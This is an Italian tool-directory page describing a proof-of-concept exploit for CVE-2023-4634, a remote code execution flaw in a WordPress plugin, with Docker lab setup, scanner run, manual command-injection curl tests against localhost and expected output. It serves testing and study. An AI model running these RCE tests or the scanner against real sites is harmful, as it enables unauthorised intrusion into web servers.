Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-4634-PoC — Exploit proof-of-concept per CVE-2023-4634, una vulnerabilità di esecuzione remota di codice nel plugin WordPress Media Library Assistant. Include un ambiente vulnerabile basato su Docker e uno scanner automatico. | Kitploit
Strumenti/GitHubGitHub/evillm/cve-2023-4634-poc
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

Exploit proof-of-concept per CVE-2023-4634, una vulnerabilità di esecuzione remota di codice nel plugin WordPress Media Library Assistant. Include un ambiente vulnerabile basato su Docker e uno scanner automatico.

Vedi Repository
137 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-4634 - Vulnerabilità RCE nel plugin WordPress Media Library Assistant

1. Costruzione e avvio dell'ambiente

root@kitploit:~
cd Stand
docker-compose up --build -d

2. Attesa dell'avvio dei servizi (60 secondi)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. Avvio della scansione della vulnerabilità

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. Test manuale della RCE

root@kitploit:~
# Test del comando id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Test del comando ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Creazione di un file di prova
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ Risultati attesi

Output di scanner.py:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

Contenuto di result.txt:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 Specifiche tecniche

Rete:

  • WordPress: 172.20.0.2:80 (accessibile su localhost:8080)
  • Database: 172.20.0.3:3306
  • Rete: 172.20.0.0/24

Requisiti:

  • CVE: CVE-2023-4634
  • Componente vulnerabile: Plugin Media Library Assistant < 3.10
  • Tipo di vulnerabilità: Esecuzione remota di codice (RCE)
  • Requisiti di sistema: Docker, Python 3.7+

📊 Prova della RCE

  • ✅ Esecuzione del comando id via HTTP
  • ✅ Esecuzione del comando ping via HTTP
  • ✅ Creazione di file in /tmp/
  • ✅ Conferma dei permessi www-data
  • ✅ Risultati documentati in result.txt

🧹 Pulizia

root@kitploit:~
cd Stand
docker-compose down -v
Scarica lo strumento